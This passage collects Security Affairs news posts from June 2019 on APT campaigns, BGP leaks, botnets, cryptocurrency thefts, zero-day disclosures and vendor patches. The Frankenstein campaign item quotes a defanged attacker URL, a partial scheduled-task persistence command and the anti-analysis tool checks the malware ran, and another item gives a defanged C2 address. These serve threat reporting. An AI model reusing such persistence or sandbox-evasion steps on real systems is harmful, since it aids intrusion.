  • Temp Group A is aggressively using ICEFOG-P and ICEFOG-M to target Russia, Kazakhstan, Tajikistan, Uzbekistan and Turkey.
  • With the file-less ICEFOG-M, host-based detection for payloads are more difficult.
  • Continued development indicates there could be more attacks leveraging ICEFOG in future campaigns, and possibly leveraged by more attackers

Pierluigi Paganini

(SecurityAffairs – cyberespionage, hacking)

The post Hunting the ICEFOG APT group after years of silence appeared first on Security Affairs.

Security Affairs 2019-06-08 07:37:33

German intelligence agencies could hack servers, smartphones and any other devices under a draft law drawn up by the German Interior Ministry.

The German Interior Ministry would allow the German domestic and foreign intelligence services are to hack into computers and smartphones under a draft law.

According to the draft law, the country’s intelligence agencies are allowed to, under specific circumstances, to intercept encrypted traffic to and from publishing companies, radio and television broadcasters, and freelance journalists. Of course, privacy advocated, and associations for the defense of human rights fear the Government could carry out a massive surveillance campaign.

“The intelligence services would also be empowered to intercept the encrypted communications of publishing companies, radio and television broadcasters and freelance journalists in certain cases, or to covertly search the digital data on their devices, meaning that they could also identify journalistic sources in the process.” reads a post published by the association Reporters Without Borders (RSF Germany).

German Intelligence
Der Eingangsbereich zur Zentrale des Bundesnachrichtendienstes (BND) in Pullach bei Muenchen, aufgenommen am Mittwoch (10.05.06). Entgegen urspruenglichen Planungen wird die Pullacher BND-Zentrale nun doch nicht geschlossen. Das technische Aufklaerungszentrum bleibt mit rund 1500 Mitarbeitern in Pullach, der Rest der insgesamt 6000 Mann starken Belegschaft zieht nach Berlin um. Foto: Johannes Simon/ ddp

The law could also authorities to identify journalistic sources threatening the constitutionally guaranteed right to source protection.

The RSF Germany also issued a statement to explain how the law would hinder the journalistic activities in the country.

If source protection is abolished, media professionals and their sources would lose the foundation for trusting cooperation. Interior Minister Horst Seehofer must put a stop to his ministry’s plans immediately,” said Christian Mihr, Executive Director of RSF Germany.

The authorities would be allowed to use spyware to compromise target device and conduct so-called “online searches” (“Online-Durchsuchung”) to access the target’s data.

The power assigned to the German intelligence agencies is very dangerous, for example, they would be able to monitor journalistic activities by wiretapping encrypted communications between journalists and their sources.  

The domestic intelligence service would also be allowed to spy on German media, and a most scaring scenario sees Germany’s foreign intelligence agency BND authorized to hack into foreign media to conduct its investigation.

“Although the draft law foresees certain protective rights for journalists, in the case of foreign media in particular the obstacles the state authorities would face are comparatively trivial.” continues the post. “The BND would be empowered to hack foreign media to guarantee “Germany’s capacity to act”. So for example it would be allowed to hack into the servers of The Washington Post if this was deemed to serve Germany’s foreign policy interests.” 

German media outlets, broadcasters, and journalists are protesting against the Interior Ministry, and also the Social Democratic Party, announced its opposition to the plans.

Interior Minister Seehofer attempted to calm the journalists by explaining that the Government will continue to offer them ‘special’ protection.

According to Germany RSP, Germany ranks 13th out of 180 states on Reporters Without Borders’ Press Freedom Index what will happen in the future?

Pierluigi Paganini

(SecurityAffairs – surveillance, German Intelligence)

The post appeared first on Security Affairs.

Recently a large chunk of European mobile traffic was rerouted through China Telecom

On June 6, for more than two hours China Telecom re-routed through its infrastructure a large chunk of European mobile traffic.

In November security researchers Chris C. Demchak and Yuval Shavitt published a paper that detailed how China Telecom has been misdirecting Internet traffic through China over the past years. The experts speculate that they were intentional BGP Hijacking attacks.

The term BGP hijacking is used to indicate the illegitimate takeover of groups of IP addresses by corrupting Internet routing tables maintained using the Border Gateway Protocol (BGP).

Now a new case sees the involvement of China Telecom, on June 6, for more than two hours a large chunk of European mobile traffic was rerouted through the infrastructure of ISP.

China Telecom Traffic Hijacking 3

China Telecom was a brand of the state-owned  China Telecommunications Corporation, but after marketization of the enterprise spin off the brand and operating companies as a separate group.

China Telecom is currently present in North American networks with 10 points-of-presence (PoPs) (eight in the United States and two in Canada), spanning major exchange points.

The last incident was caused by the propagation of routing announcements beyond the intended scope, so-called BGP route leak.

The BGP route leak involved the Swiss data center of the company Safe Host that accidentally leaked over 70,000 routes from its routing table to the Chinese ISP.

China Telecom did not discard the BGP leak, instead, it announced the Safe Host’s routes as its own routes, this means that all the traffic for many European mobile networks was re-routed through its network.

“Beginning at 09:43 UTC today (6 June 2019), Swiss data center colocation company Safe Host (AS21217) leaked over 70,000 routes to China Telecom (AS4134) in Frankfurt, Germany.” reads the analysis published by Oracle. “China Telecom then announced these routes on to the global internet redirecting large amounts of internet traffic destined for some of the largest European mobile networks through China Telecom’s network.”

Most impacted European networks included Swisscom (AS3303) of Switzerland, KPN (AS1130) of Holland, and Bouygues Telecom (AS5410) and Numericable-SFR (AS21502) of France.

The traffic was re-directed for over two hours and numerous leaked routes were more-specifics of routed prefixes, a circumstance that suggests the use of route optimizer technology.

Users of the affected mobile network experienced connection lagging and in some cases, they were not able to connect to some servers.

“Today’s incident shows that the internet has not yet eradicated the problem of BGP route leaks,” concludes Oracle.

“It also reveals that China Telecom, a major international carrier, has still implemented neither the basic routing safeguards necessary both to prevent propagation of routing leaks nor the processes and procedures necessary to detect and remediate them in a timely manner when they inevitably occur. Two hours is a long time for a routing leak of this magnitude to stay in circulation, degrading global communications.”

How to prevent such kind of attacks?

Security experts are pushing to adopt solutions to protect BGP, Cloudflare for example, sustains that Resource Public Key Infrastructure (RPKI) could secure BGP routing.

Pierluigi Paganini

(SecurityAffairs – BGP hijacking, China Telecom)

The post Recently a large chunk of European mobile traffic was rerouted through China Telecom appeared first on Security Affairs.

Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks

Cisco Talos experts uncovered a new wave of attacks tracked as Frankenstein campaign, attackers used tools built by combining four open-source techniques.

Security experts at Cisco Talos uncovered a series of highly targeted attacks, tracked as Frankenstein campaign, hackers used tools built by combining four different open-source techniques.

Attackers behind the Frankenstein campaign carried out several malware-based attacks between January and April 2019. Talos researchers discovered a low volume of documents in various malware repositories.

“Cisco Talos recently identified a series of documents that we believe are part of a coordinated series of cyber attacks that we are calling the Frankenstein campaign.” reads the analysis published by Cisco Talos. “We assess that this activity was hyper-targeted given that there was a low volume of these documents in various malware repositories. Frankenstein — the name refers to the actors’ ability to piece together several unrelated components — leveraged four different open-source techniques to build the tools used during the campaign.”

Researchers at Talos team believe the attackers are moderately sophisticated but highly resourceful.

The attackers used multiple anti-detection techniques such as checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the malicious code was running in a virtualized environment.

Other anti-detection techniques such as only responding to GET requests that contained predefined fields, and using encryption to protect data in transit.

Talos experts identified two weaponized Word documents used in the Frankenstein campaign that were likely sent to the victims via emails. The first document named “MinutesofMeeting-2May19.docx“, displays the national flag of Jordan, once opened it will fetch a remote template and trigger the CVE-2017-11882 exploit to execute code on the target machine.

“Once the victim opens the document, it fetches a remove template from the actor-controlled website, hxxp://droobox[.]online:80/luncher.doc. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim’s machine. After the exploit, the file would run a command script to set up persistence as a scheduled task named “WinUpdate”.” continues the analysis. 

“/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR” That scheduled task would run a series of base64-encoded PowerShell commands that acted as a stager.”

frankenstein campaign

The second sample prompts the victim to enable macros and run a Visual Basic script. 

One of the documents detected by the experts appears as a document created by the security firm Kaspersky, in other two cases attackers used documents specifically designed to target Middle Eastern entities.

Experts also described a

In the second scenario observed by Talos, threat actors used a weaponized document. When the macro is enabled, it executes a Visual Basic Application (VBA) script implementing two anti-analysis features. 

The script first queries Windows Management Instrumentation (WMI) to check if specific applications are running: VMWare, Vbox, Process Explorer, Process Hacker, ProcMon, Visual Basic, Fiddler, and WireShark. Then the script checks if specific tasks are running: VMWare, Vbox, VxStream, AutoIT, VMtools, TCPView, WireShark, Process Explorer, Visual Basic, and Fiddler. 

If the script finds one of the above apps or tasks it halts its execution, otherwise it calls WMI and determines the number of cores allocated to the system and exits if the number of cores is less than two. 

Once the evasion checks were complete, the attackers used MSbuild to execute an actor-created file named “LOCALAPPDATA\Intel\instal.xml”. According to Talos, threat actors chose MSBuild because it is a signed Microsoft binary, this feature allows to bypass application whitelisting controls on the host when being used to execute arbitrary code. 

Attackers used a PowerShell Empire agent to gather information on the local system, including Username, Domain name, Machine name, Public IP address, administrative privileges, currently running processes, operating system version, and the security system’s SHA256 HMAC. 

Then the data is sent back to the C&C server via an encrypted channel.

“A campaign that leverages custom tools is more easily attributed to the tools’ developers. One example of this was the code overlap in the VPNFilter malware that allowed us to associate the activity with the BlackEnergy malware.” Talos concludes. “By contrast, operations performed with open-source frameworks are extremely difficult to attribute without additional insights or intelligence.”

Pierluigi Paganini

(SecurityAffairs – Frankenstein campaign, hacking)

The post Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks appeared first on Security Affairs.

Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know

In October 2017, the city of Fort Worth, Texas became the target of a phishing scam.

Their accounts payable department received an email that appeared to be from Imperial Construction, a company that was doing business with the city at the time. The sender of the email, later identified as Gbenga A. Fadipe, requested a change of account.

The scam email prompted the department to change an electronic deposit from Plains Capital Bank to a different account with Chase Bank. Given the convincing nature of the email, the request received approval. The city’s accounts payable department believed that Imperial Construction had simply changed banks.

However, this wasn’t the case. Fadipe had planned the cyberattack to gain access to city accounts. According to the arrest warrant affidavit, he withdrew thousands of dollars between November 2017 and January 2018 from the new account with Chase Bank, severely compromising the cybersecurity of Fort Worth.

City officials responded, claiming that Fort Worth “had been the victim of fraud in late 2017 when, due to human error, a vendor payment was redirected to a bad actor.” As of now, Tarrant County has charged Fadipe with theft of property greater than $300,000, though the true cost of the scam is much higher. The injustice might have ended here, were it not for the events that transpired shortly afterwards.

Retaliation Against Whistleblowers

Fort Worth’s former IT manager, William Birchett, went to officials with concerns over the state of their cybersecurity following the attack. He made several claims, including that the city had left the medical and personal information of their employees accessible to anyone with internet access.

Birchett also brought attention to how the city had lied about its compliance with FBI crime database regulations. He reported his findings and submitted a proposal to Kevin Gunn, the city’s acting chief financial officer. Birchett also went to Roger Wright, the city’s acting chief technology officer.

Instead of moving forward with the changes, city officials fired Birchett in retaliation. They would later fire one of Birchett’s coworkers, Ronald Burke, who had previously supervised him. Both men have since filed whistleblower lawsuits against the city, with representation from attorney Stephen Kennedy.

Burke has also claimed the city retaliated against him for reporting issues with their cybersecurity and compliance with federal regulations. Like Birchett, Burke is seeking more than $1 million from the city of Fort Worth, which is “fully prepared to defend itself,” according to a recent statement from officials.

Response From Fort Worth Officials

In response to the allegations from Birchett and Burke, city officials said, “The people who have filed these suits were responsible for managing the very security items that they are now criticizing…” Officials went on to say they resolved the problem with their employee data “immediately,” but this is not the case.

Stephen Kennedy responded to the attempt by city officials to address the controversy, saying, “The City is not being forthright when it claims that it ‘immediately’ resolved issues concerning preservation of the City employees’ medical data information, unless your definition of the word immediate means six months…”

Birchett and Burke have provided additional insight into the city’s negligence. They allege that they repeatedly reported on problems with Fort Worth’s cybersecurity and compliance with federal Criminal Justice Information Services regulations. Despite their efforts, city officials refused to take action.

The behavior of Kevin Gunn, Robert Wright and other Fort Worth officials is indicative of a larger problem than the phishing scam with Imperial Construction. It shows a pattern of irresponsibility and neglect that goes back farther than 2017. Even with access to potential solutions, officials failed to act.

The Importance of Transparency

The decision to retaliate against whistleblowers is often counterintuitive. In this instance, the city of Forth Worth was attempting to suppress information, but the firing of Birchett and Burke only brought that information to the surface. Though city officials tried to ignore the flaws in their system, they only intensified.

This speaks to the importance of individuals like William Birchett and Ronald Burke. Without the courage of whistleblowers, an organization with illicit practices can continue to grow. Even if that organization retaliates, whistleblowers have protection under the law and can trust in the justice system to serve its purpose.

As context, OSHA’s Whistleblower Protection Program enforces the provisions in more than twenty whistleblower statutes, protecting employees in the healthcare, airline and food safety industries, among other sectors. In short, those who come forward with information about a company can expect fair treatment.

Looking Toward the Future

Gbenga A. Fadipe’s phishing scam revealed far more about the city of Fort Worth than anticipated. What started with a fraudulent email quickly transformed into something else, and now, Birchett and Burke are set to move forward with their individual lawsuits against the city. As the situation unfolds, it will likely have implications outside the state of Texas.

About the author

about paycheck

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know appeared first on Security Affairs.

SandboxEscaper releases Byebear exploit to bypass patched EoP flaw

SandboxEscaper publicly disclosed a second Windows zero-day exploit dubbed ByeBear to bypass a recently patched elevation of privilege issue.

SandboxEscaper is a well of neverending surprises, today publicly disclosed a second Windows zero-day exploit (dubbed ByeBear) to bypass a recently patched elevation of privilege issue.

SandboxEscaper is well-known researchers that publicly disclosed several zero-day exploits for unpatched Windows flaws. At the end of May, she disclosed four Microsoft zero-day flaws in just 24 hours.

One of the flaw could be exploited by an attacker to bypass an elevation of privilege issue in Windows. The flaw, tracked s CVE-2019-0841, was already patched by Windows, it affects the way Windows AppX Deployment Service (AppXSVC) handles hard links.

Evidently, the fix did not completely solve the problem because now SandboxEscaper has developed a new exploit to trigger the flaw bypassing the Microsoft security patch.

The researchers explained that a specially crafted malicious application could be used to escalate its privileges and take complete control of Windows machine.

Below a video PoC for the ByeBear exploit that abuses Microsoft Edge browser to write discretionary access control list (DACL) as SYSTEM privilege.

“It’s going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes, it means you either have 1 core or set your VM to have multiple processors instead of multiple cores… which will also cause it to lock up,” wrote SandboxEscaper.

“This bug is most definitely not restricted to the edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and closes it as soon as the bug completes.”

“I think it will also trigger by just launching edge once, but sometimes you may have to wait for a little. I didn’t do extensive testing…found this bug and quickly wrote up a PoC, took me like 2 hours total, finding LPEs is easy.”

In August 2018, SandboxEscaper disclosed a first zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems.

In 2018, SandboxEscaper has publicly dropped exploits for other two Windows zero-day vulnerabilities forcing Microsoft to quickly address them to avoid its users being targeted by hackers.

In October, SandboxEscaper released the proof-of-concept exploit code for Microsoft Data Sharing that allowed a low privileged user to delete critical system files from Windows systems.

In December, she published a proof-of-concept (PoC) code for a new Windows zero-day, it is the fourth she released this year.

Microsoft plans to release it Patch Tuesday security updates for June on 11th June, and experts believe it will address this ByeBear zero-day and the four previous exploits disclosed by the expert.

Pierluigi Paganini

(SecurityAffairs – ByeBear, hacking)

The post SandboxEscaper releases Byebear exploit to bypass patched EoP flaw appeared first on Security Affairs.

Crooks stole about $10 million from GateHub cryptocurrency wallet service

Cyber criminals stole 3.2 million Ripple coins (XRP), worth nearly $10 million, from the users of the GateHub cryptocurrency wallet service.

A new cyber heist made the headlines, crooks stole 3.2 million Ripple coins (XRP), worth nearly $10 million, from the users of the GateHub cryptocurrency wallet service.

“Recently, we have been notified by our customers and community members about funds on their XRP Ledger wallets being stolen and immediately started monitoring network activity and conducted an extensive internal investigation.” reads a preliminary statement published by GateHub.

“Although we have not identified any action or omission by GateHub that may have facilitated or allowed this apparent theft to occur, we apologize deeply to all of our customers for this issue and pledge to get to the bottom of it.”

GateHub

The company pointed speculate the attackers might have abused API to steal the funds. GateHub explained that each API requests to the victim’s accounts were authorized with a valid access token. The company did not observe suspicious logins or evidence of brute force attacks, however, its staff noticed an increased amount of API calls using valid access tokens.

The suspicious requests were originated from a limited number of IP addresses likely compromised by the attackers. At the time, it is still unclear how the attackers have decrypted the secret keys. The company disabled all the access tokens on June 1st.

“We have however detected an increased amount of API calls (with valid access tokens) coming from a small number of IP addresses which might be how the perpetrator gained access to encrypted secret keys,” continues the statement.

“That, however, still doesn’t explain how the perpetrator was able to gain other required information needed to decrypt the secret keys. All access tokens were disabled on June 1st after which the suspicious API calls were stopped,”

The community member Thomas Silkjær who, one of members who warned GateHub about the theft, published a report on incident. that:

“On June 1 we were made aware of a theft of 201,000 XRP … and immediately started investigation. It turned out that the account robbed was managed through Gatehub.net, and that the offending account (r9do2Ar8k64NxgLD6oJoywaxQhUS57Ck8k) had stolen substantial amounts from several other XRP accounts, likely to be or have been managed through Gatehub.net.” reads the report.

The experts identified several other accounts connected to the cyber heists, for a total of 12 primary suspect accounts.

“From analysing access logs by victims and transactions made on the XRP ledger, it does not appear that any accounts were breached on gatehub.net directly, using client login credentials.” states the researcher.

The community member was not able to discover the root cause of the hack, it explored various options including repeating nonces, a bad practice in handling RippleTrade migration of user accounts, Browser client hacking, and also the leak of an old data base containing encrypted private keys.

GateHub immediately notified law enforcement, an investigation is still ongoing.

Pierluigi Paganini

(SecurityAffairs – hacking, GateHub)

The post Crooks stole about $10 million from GateHub cryptocurrency wallet service appeared first on Security Affairs.

New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers

A new botnet tracked as GoldBrute is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

A new botnet tracked as GoldBrute has appeared in the threat landscape, it is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

The botnet is currently targeting over 1.5 million unique endpoints online, it is used to brute-force RDP connections or to carry out credential stuffing attacks.

“This botnet is currently brute forcing a list of about 1.5 million RDP servers exposed to the Internet. Shdoan lists about 2.4 million exposed servers  [1]. GoldBrute uses its own list and is extending it as it continues to scan and grow.” wrote the researchers Renato Marinho of Morphus Labs who discovered the bot.

The GoldBrute botnet currently has a single command and control server (104[.]156[.]249[.]231), its bots exchange data with the C2 via AES encrypted WebSocket connections to port 8333. 

Querying the Shodan search engine for systems with RDP enabled it is possible to find roughly 2.4 million machines.

“An infected system will first be instructed to download the bot code. The download is very large (80 MBytes) and includes the complete Java Runtime. The bot itself is implemented in a Java class called GoldBrute” continues the expert.

“Initially, the bot will start scanning random IP addresses to find more hosts with exposed RDP servers. These IPs are reported back to the C&C server. After the bot reported 80 new victims, the C&C server will assign a set of targets to brute force to the bot.” 

GoldBrute botnet

Below the complete attack chain:

  • Botnet brute-forces RDP connection and gains access to a poorly protected Windows system.
  • It downloads a big zip archive containing the GoldBrute Java code and the Java runtime itself. It uncompresses and runs a jar file called “bitcoin.dll”.
  • The bot will start to scan the internet for “brutable” RDP servers and send their IPs to the C2 that in turn sends a list of IP addresses to brute force.
  • GoldBrute bot gets different “host + username + password”  combinations.
  • Bot performs brute-force attack and reports result back to C2 server.

According to the researcher, the list of “brutable” RDP targets is rapidly growing, this suggests that also the size of the botnet is increasing.

“Analyzing the GoldBrute code and understanding its parameters and thresholds, it was possible to manipulate the code to make it save all “host + username + password” combinations on our lab machine.” continues the expert.

“After 6 hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique. Of course, we didn’t execute the brute-force phase. With the help of an ELK stack, it was easy to geolocate and plot all the addresses in a global world map, as shown below.”

goldbrute botnet map

The GoldBrute botnet is difficult to detect because every bot only launches one password-guessing attempt per victim.

The report published by Marinho also includes a list of IoCs.

Pierluigi Paganini

(SecurityAffairs – GoldBrute botnet, hacking)

The post New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers appeared first on Security Affairs.

Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers

The Cryptocurrency startup Komodo hacked itself to protect the funds of its users and avoid that hackers steal them exploiting a flaw in its Agama wallet.

The story I’m going to tell you is amazing, the Cryptocurrency startup Komodo hacked itself after discovered a backdoor in its Agama wallet.

Komodo’s Agama Wallet allows users to store KMD and BTC cryptocurrencies, but the presence of a backdoor posed a serious risk to them.

Komodo Agama Wallet 1

Once discovered the flaw, the company decided to exploit it to protect the funds, anticipating the hackers and moving them to a secure location.

“Today, Komodo were made aware of an issue with one of the libraries used by the Agama wallet, potentially putting some user funds at risk.” reads a blog post published by the company.

“After discovering the vulnerability, our Cyber Security Team used the same exploit to gain control of a lot of affected seeds and secure the funds at risk.” 

The experts at the company moved around 8 million KMD and 96 BTC from its Agama flawed wallets to safe wallets RSgD2cmm3niFRu2kwwtrEHoHMywJdkbkeF(KMD) and 1GsdquSqABxP2i7ghUjAXdtdujHjVYLgqk (BTC) under their control.

The owners of those wallets that have not been swept, or that have other assets than KMD and BTC, have to move all their funds from Agama to a new address as soon as possible. Komodo provided a list of safe wallets and other information on its support page.

Experts pointed out that the Verus version of Agama wallet is not affected by this vulnerability, its latest version supports Komodo in both lite mode and native mode.

The backdoor in the Agama wallet app was discovered by experts at the security team of the npm JavaScript package repository.

“The attack was carried out by using a pattern that is becoming more and more popular; publishing a “useful” package (electron-native-notify) to npm, waiting until it was in use by the target, and then updating it to include a malicious payload.” reads the post published by the npm, Inc. security team.

Npm security team spotted a supply chain attack, hackers used a malicious update for the electron-native-notify (version 1.1.6) JavaScript library. It included a malicious code designed to steal cryptocurrency wallet seeds and other login passphrases.

“The GitHub user sawlysawly published this commit on Mar 8th which added electron-native-notify^1.1.5 as a dependency to the EasyDEX-GUI application (which is used as part of the Agama wallet).” continues the security team at npm.

The experts discovered that the attackers targeted the Agama cryptocurrency wallet which was using the EasyDEX-GUI application that was loading the now-malicious electron-native-notify library.

The backdoor was added to the electron-native-notify library on March 8, and it was included in the main Agama wallet on April 13, when Komodo released Agama version 0.3.5.

This means that users that logged in to any version of Agama wallet after 13 April likely had their wallet credentials compromised.

The npm experts also published a video that shows how the vulnerable version of Agama wallet sends the private seed associated with a waller to a remote server in the background.

Komodo experts used the same technique to transfer the funds of the company clients to a safe wallet before hackers could have stolen them.

Pierluigi Paganini

(SecurityAffairs – Komodo, hacking)

The post Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers appeared first on Security Affairs.

Tor Project released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android

A new version of the popular Tor Browser was released by the Tor Project, it is Tor Browser 8.5.1 for Windows, Mac, Linux, and Android.

The Tor Project has released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android, the new version of the popular anonymizing browser.

This release includes a temporary fix for a known WebGL fingerprinting technique. Tor 8.5.1 can be downloaded for free from the Tor Browser download page and from the distribution directory.

Tor Browser 8.5.1

The development team disabled WebGL readPixel() function that could be abused to fingerprint a Tor Browser user. 

“Tor Browser 8.5.1 is the first bugfix release in the 8.5 series and aims at mostly fixing regressions and providing small improvements related to our 8.5 release.” reads the announcement from the Tor Project. “Additionally, we disable the WebGL readPixel() fingerprinting vector, realizing, though, that we need a more holistic approach when trying to deal with the fingerprinting potential WebGL comes with.”

The developers defined this fix a temporary solution that needs a more holistic approach.

Bwloe the full changelog since Tor Browser 8.5:

  • All platforms
    • Update Torbutton to 2.1.10
      • Bug 30565: Sync nocertdb with privatebrowsing.autostart at startup
      • Bug 30464: Add WebGL to safer descriptions
      • Translations update
    • Update NoScript to 10.6.2
      • Bug 29969: Remove workaround for Mozilla’s bug 1532530
    • Update HTTPS Everywhere to 2019.5.13
    • Bug 30541: Disable WebGL readPixel() for web content
  • Windows + OS X + Linux
    • Bug 30560: Better match actual toolbar in onboarding toolbar graphic
    • Bug 30571: Correct more information URL for security settings
  • Android
    • Bug 30635: Sync mobile default bridges list with desktop one
  • Build System
    • All platforms
      • Bug 30480: Check that signed tag contains expected tag name

Pierluigi Paganini

(SecurityAffairs – Tor Browser 8.5.1, Tor Project)

The post Tor Project released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android appeared first on Security Affairs.

VMware addressed flaws in its Workstation and Tools

VMware has informed its users that it has patched two high-severity vulnerabilities that affect its Tools and Workstation software.

VMware has patched two high-severity flaws that affect its Tools and Workstation software.

The first security flaw, tracked as CVE-2019-5522, affects VMware Tools 10.x on Windows. The vulnerability is an out-of-bounds read issue in the vm3dmp driver in Windows guest machines, it was reported by the researchers ChenNan and RanchoIce of Tencent ZhanluLab

“VMware Tools update addresses an out of bounds read vulnerability in vm3dmp driver which is installed with vmtools in Windows guest machines.  VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.1.” reads the advisory published by VMware.

“A local attacker with non-administrative access to a Windows guest with VMware Tools installed may be able to leak kernel information or create a denial of service attack on the same Windows guest machine,”

The company addressed the vulnerability with the release of the version 10.3.10, unfortunately, no workarounds are available.

The second issue, tracked as CVE-2019-5525, is a use-after-free bug affecting the Advanced Linux Sound Architecture (ALSA) backend in Workstation 15.x. The vulnerability could be exploited by an attacker with normal user privileges on the guest machine to execute arbitrary code on the underlying Linux host. Chaining the issue with another vulnerability it is possible to execute arbitrary code.

“VMware Workstation contains a use-after-free vulnerability in the Advanced Linux Sound Architecture (ALSA) backend. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.5.” states the advisory.

“A malicious user with normal user privileges on the guest machine may exploit this issue in conjunction with other issues to execute code on the Linux host where Workstation is installed.”

The company addressed this vulnerability with the release of the Workstation 15.1.0 for Linux. The vulnerability, rated as “high severity,” was reported by Brice L’helgouarc’h from Amossys.

Pierluigi Paganini

(SecurityAffairs – hacking)

The post VMware addressed flaws in its Workstation and Tools appeared first on Security Affairs.

Remote code execution flaw in Ministra IPTV Platform exposes user data and more

Researchers at security firm CheckPoint have discovered multiple critical vulnerabilities in a popular IPTV middleware platform.

Security experts at CheckPoint have discovered multiple critical flaws in a popular IPTV middleware platform that is used by more than a thousand online media streaming services to manage their millions of subscribers.

Ministra TV platform is a PHP-based middleware platform for media streaming services, it manages Internet Protocol television (IPTV), video-on-demand (VOD) and over-the-top (OTT) content, licenses and their subscribers.

In order to receive the television broadcast, the set-top boxes (STB) connects to the Ministra and service providers use the platform to manage their customers.

The vulnerabilities affect the administrative panel of the Ministra TV platform (former Stalker Portal), it could be exploited by an attacker to bypass authentication access to information associated with subscribers.

Another scaring aspect of the discovery is that an attacker could exploit the flaws to broadcast and stream its content on the devices of the affected networks.

The platform is developed by the Ukrainian company Infomir, most of the providers that use are located in the United States (199), following with Netherlands (137), Russia (120), France (117) and Canada (105).

ipvt platform Ministra flaws

“About a year ago Check Point Research discovered critical vulnerabilities in a Ukrainian TV streaming platform that, if exploited, could leave service providers exposed to a serious breach.” states a blog post published by Check Point. “The risks would be their entire customer database of personal info and financial details as well as allowing an attacker to potentially stream any content they choose on to the screens of their customer network.

CheckPoint researchers discovered a logical vulnerability in an authentication process implemented by the Ministra platform. A function used to authenticate users fails to validate the request, allowing a remote attacker to bypass authentication and perform SQL injection by exploiting a separate vulnerability.

“[ Ministra] It is PHP based, and like most web-based platforms, it has an admin interface that requires authentication.” continues the experts. “However, we were able to bypass the authentication mechanism and utilize some of the admin AJAX API functions. This lead to SQL Injection chained to PHP Object Injection vulnerabilities, effectively allowing us to remotely execute code on the server. “

The experts also demonstrated in a video PoC that it is possible to chain the flaws with a PHP Object Injection issue to remotely execute arbitrary code on the targeted server.

“In this particular case, we used the authentication bypass to perform an SQL Injection on the server,” continues the post. “With that knowledge, we escalated this issue to an Object Injection vulnerability, which in turn allowed us to execute arbitrary code on the server, potentially impacting not only the provider but also the provider’s clients.”

The security experts reported the flaws to the company, that addressed them with the release of Ministra version 5.4.1.

Pierluigi Paganini

(SecurityAffairs – Ministra, hacking)

The post Remote code execution flaw in Ministra IPTV Platform exposes user data and more appeared first on Security Affairs.

Cisco disclosed several flaws in Cisco Industrial Network Director

Cisco disclosed several flaws in its CISCO Industrial Network Director product, including a high severity code execution vulnerability.

Cisco employees discovered several vulnerabilities in CISCO Industrial Network Director product, including a high severity code execution flaw.

The Cisco Industrial Network Director is used to manage industrial networks, it helps operations teams gain full visibility into the automation network for improved system availability and increase overall equipment effectiveness

Three flaws were discovered during an internal security testing, the most serious one tracked as CVE-2019-1861 is a remote code execution vulnerability that received a CVSS score of 7.2.

CISCO Industrial Network Director

“A vulnerability in the software update feature of Cisco Industrial Network Director could allow an authenticated, remote attacker to execute arbitrary code.” reads the security advisory published by Cisco.

“The vulnerability is due to improper validation of files uploaded to the affected application. An attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.”

The flaw could be exploited by an authenticate attacker to the target system with admin privileges and upload any malicious file, then execute arbitrary code with elevated privileges.

The security hole has been patched with the release of version 1.6.0. Prior versions are impacted.

Another flaw discovered in the Industrial Network Director is a stored cross-site scripting (XSS) tracked as CVE-2019-1882. The flaw, rated as medium severity, can be exploited remotely by an authenticated attacker to carry out XSS attacks,

“A vulnerability in Cisco Industrial Network Director could allow an authenticated, remote attacker to conduct stored cross-site scripting (XSS) attacks.” reads the Cisco Advisory.

“The vulnerability is due to improper validation of content submitted to the affected application. An attacker could exploit this vulnerability by sending requests containing malicious values to the affected system. A successful exploit could allow the attacker to conduct XSS attacks.”

The third flaw is a cross-site request forgery (CSRF) flaw that could be exploited by an unauthenticated attacker to perform arbitrary actions on the targeted device.

The flaw tracked as CVE-2019-1881 has been rated as medium severity.

“A vulnerability in the web-based management interface of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.” reads the advisory.

“The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to use a web browser and the privileges of the user to perform arbitrary actions on an affected device.”

Pierluigi Paganini

(SecurityAffairs – CISCO, hacking)

The post Cisco disclosed several flaws in Cisco Industrial Network Director appeared first on Security Affairs.

Platinum APT and leverages steganography to hide C2 communications

The Platinum cyber espionage group uses steganographic technique to hide communications with the Command and Control Servers  (C&C).

Experts from Kaspersky have linked the Platinum APT group with cyber attacks involving an elaborate, and new steganographic technique used to hide communications with C2 servers.

The APT group was discovered by Microsoft in 2016, it targeted organizations in South and Southeast. According to Microsoft, the Platinum has been active since at least 2009, it was responsible for spear phishing attacks on ISPs, government organizations, intelligence agencies, and defense institutes.

The hackers don’t appear to be financially motivated due to the nature of targeted entities and TTPs of the group.

In June 2018, experts at Kaspersky were investigating attacks against government and military entities in South and Southeast Asian countries,

The experts tracked the campaign as EasternRoppels, they speculate it may have started as far back as 2012.

